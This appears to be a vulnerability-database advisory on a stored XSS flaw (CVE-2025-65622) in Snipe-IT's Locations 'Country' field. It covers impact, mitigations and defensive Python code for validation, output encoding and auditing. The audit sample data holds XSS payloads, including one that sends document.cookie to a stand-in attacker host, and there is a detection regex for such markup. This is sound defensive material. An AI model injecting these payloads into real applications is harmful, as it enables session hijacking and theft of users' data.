CVE-2025-65622: n/a
Snipe-IT before 8.3.4 allows stored XSS via the Locations "Country" field, enabling a low-privileged authenticated user to inject JavaScript that executes in another user's session.
AI Analysis
Technical Summary
CVE-2025-65622 is a stored cross-site scripting (XSS) vulnerability in Snipe-IT, the open-source IT asset management application, affecting versions before 8.3.4. A value written to the "Country" field of a Location record is persisted and later rendered to other users in a way that lets embedded markup execute, so an authenticated user with permission to create or edit locations can store JavaScript that runs in the browser of any user who views the affected record or listing. Because the payload is persisted, it fires when a victim opens a page they normally use, and it runs with the victim's session: the script can issue authenticated requests on their behalf (creating or modifying users or assets if the victim is an administrator), read page content, or present phishing content. Exploitation requires an account and a victim who views the poisoned data, which narrows the attack surface but describes the everyday situation in a shared administrative tool. The analysis applies the CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (base score 5.4, medium); note that the CVE record itself carries no CVSS vector (see Technical Details below). Changed scope (S:C) reflects that the impact lands in the victim's browser rather than in the vulnerable component. No exploitation in the wild had been reported at the time of analysis. This is a CWE-79 issue; the durable fix is to encode stored values for the HTML context in which they are emitted and, for a field such as Country, to accept only values from a server-side allow-list, since a select list in the browser does not constrain what a crafted request can send.
Potential Impact
For European organizations that run Snipe-IT to track IT assets, licences and accessories, the practical impact is that a low-privileged insider, or an attacker holding any compromised account, can gain the effective privileges of whichever user views the poisoned Location record. Snipe-IT is typically administered by IT staff with broad rights, so the likely victim is an administrator: the injected script can then alter asset and user records, export inventory data that maps hardware to people and sites, or create further accounts, undermining the confidentiality and integrity of the asset register. Availability is not directly affected, but the system's value as a trusted source of truth is. Organizations in regulated sectors such as finance, healthcare and public administration may also face notification and reputational consequences if inventory data is exposed. The need for an account and for a victim to view the record rules out mass automated exploitation, but not targeted use by an insider or by an attacker who has phished one ordinary user and wants an administrator's session. Environments with many users able to edit locations, or with loosely assigned permissions, are the most exposed.
Mitigation Recommendations
To mitigate CVE-2025-65622, upgrade Snipe-IT to 8.3.4 or later, which fixes the issue; this is the only complete remediation. Until the upgrade is done, reduce who can reach the vulnerable input: Snipe-IT's permission groups include separate create and edit rights for Locations, so restrict them to trusted administrators rather than leaving them with general users. Audit existing Location records for Country values that are not a plain country name or two-letter code, because a payload stored before patching keeps firing until the record is cleaned. Teams that build from source can reject Country values that are not on an allow-list and encode the field for its HTML context on output, but that is a stopgap the upgrade supersedes. A Content Security Policy that disallows inline scripts limits what injected markup can do; treat it as defense in depth, not as a fix. Laravel applications such as Snipe-IT mark the session cookie HttpOnly by default, so outright cookie theft is less likely than a script acting within the victim's session; monitor for administrative actions (user creation, permission changes, bulk exports) that do not match the acting user's normal behaviour. Tell users to report unexpected pop-ups or redirects inside the application, and include the rendering of stored input in routine code review and security testing.
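The following Python is an added example, not Snipe-IT's code and not part of the advisory. It shows the two server-side controls described in the Technical Summary and the Mitigation Recommendations, an allow-list check on Country and context-aware HTML output encoding, and then runs an audit over a constructed location export to flag records whose Country value could only have arrived through a crafted request. The record layout (id, name, country), the assumption that Country is stored as an ISO 3166-1 alpha-2 code, and the truncated code list are all assumptions made for illustration.

```python
"""Added example, not Snipe-IT code: server-side allow-list validation and
HTML output encoding for a free-text 'Country' field, plus an audit of stored
location records. Record layout and the two-letter-code assumption are
illustrative, not the real Snipe-IT schema."""
import html
import json
import re
from typing import Dict, List, Optional

# Allow-list of ISO 3166-1 alpha-2 codes. Deliberately truncated sample; a
# deployment would load the full list. Assumption: Country is stored as a code.
ISO_3166_ALPHA2 = {"BE", "DE", "FR", "GB", "IT", "NL", "SE", "US"}

# Markers that never appear in a legitimate country value. Used only to
# separate probable payloads from plain typos during triage.
SUSPICIOUS = re.compile(r"<|>|javascript:|\bon\w+\s*=|&#", re.IGNORECASE)


def validate_country(value: object) -> Optional[str]:
    """Return the normalised two-letter code, or None if the value is not on
    the allow-list. The browser's select list is not a control: the request
    body can be crafted directly, so this check has to run on the server."""
    if not isinstance(value, str):
        return None
    code = value.strip().upper()
    if len(code) != 2 or code not in ISO_3166_ALPHA2:
        return None
    return code


def render_country_cell(value: str) -> str:
    """Encode the stored value for an HTML text context before emitting it.
    html.escape with quote=True turns & < > " ' into entities, so a stored
    payload is displayed as text instead of being parsed as markup."""
    return "<td>{}</td>".format(html.escape(value, quote=True))


def audit_locations(records: List[Dict]) -> List[Dict]:
    """Flag every record whose country fails the allow-list. A stored payload
    keeps firing after the upgrade until the record is cleaned, so this runs
    against existing data, not just new input."""
    findings = []
    for rec in records:
        country = rec.get("country")
        if country is None or validate_country(country) is not None:
            continue
        findings.append({
            "id": rec.get("id"),
            "name": rec.get("name"),
            "country": country,
            "looks_like_markup": bool(
                isinstance(country, str) and SUSPICIOUS.search(country)
            ),
        })
    return findings


# Constructed sample resembling a JSON export of the Locations table.
SAMPLE_EXPORT = json.dumps([
    {"id": 1, "name": "Berlin HQ", "country": "DE"},
    {"id": 2, "name": "Paris office", "country": "fr"},
    {"id": 3, "name": "Legacy import", "country": "Germany"},
    {"id": 4, "name": "Storage room",
     "country": "<img src=x onerror=alert(document.cookie)>"},
    {"id": 5, "name": "Lab",
     "country": "\"><svg onload=fetch('//attacker.example/'+document.cookie)>"},
])


def run_audit(export_json: str = SAMPLE_EXPORT) -> List[Dict]:
    """Parse an export and return the findings; kept separate so the audit
    can be pointed at a real export file instead of the sample."""
    return audit_locations(json.loads(export_json))


if __name__ == "__main__":
    for finding in run_audit():
        print(finding)
    # Even with a payload already stored, correct output encoding renders it
    # as inert text in the victim's browser.
    print(render_country_cell(json.loads(SAMPLE_EXPORT)[3]["country"]))
```

Record 3 ("Germany") is flagged as off-list but not as markup, so a triage can separate legacy typos from payloads; records 4 and 5 are flagged as both. The encoding step is what neutralises a record that was already stored before the upgrade, which is why the audit and the output fix belong together.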
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Belgium, Italy
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-11-18T00:00:00.000Z
- CVSS Version: null (no CVSS vector is attached to the CVE record)
- State: PUBLISHED
Threat ID: 692e0bb43937fa579fdf7d55
Added to database: 12/1/2025, 9:42:12 PM
Last enriched: 12/8/2025, 10:08:13 PM
Last updated: 1/16/2026, 3:04:12 AM
Views: 66
Related Threats
- CVE-2026-1018: CWE-36 Absolute Path Traversal in Gotac Police Statistics Database System (High)
- CVE-2025-62582: CWE-306 Missing Authentication for Critical Function in Delta Electronics DIAView (Critical)
- CVE-2025-62581: CWE-321 Use of Hard-coded Cryptographic Key in Delta Electronics DIAView (Critical)
- CVE-2025-65118: CWE-427 in AVEVA Process Optimization (High)
- CVE-2025-65117: CWE-676 in AVEVA Process Optimization (High)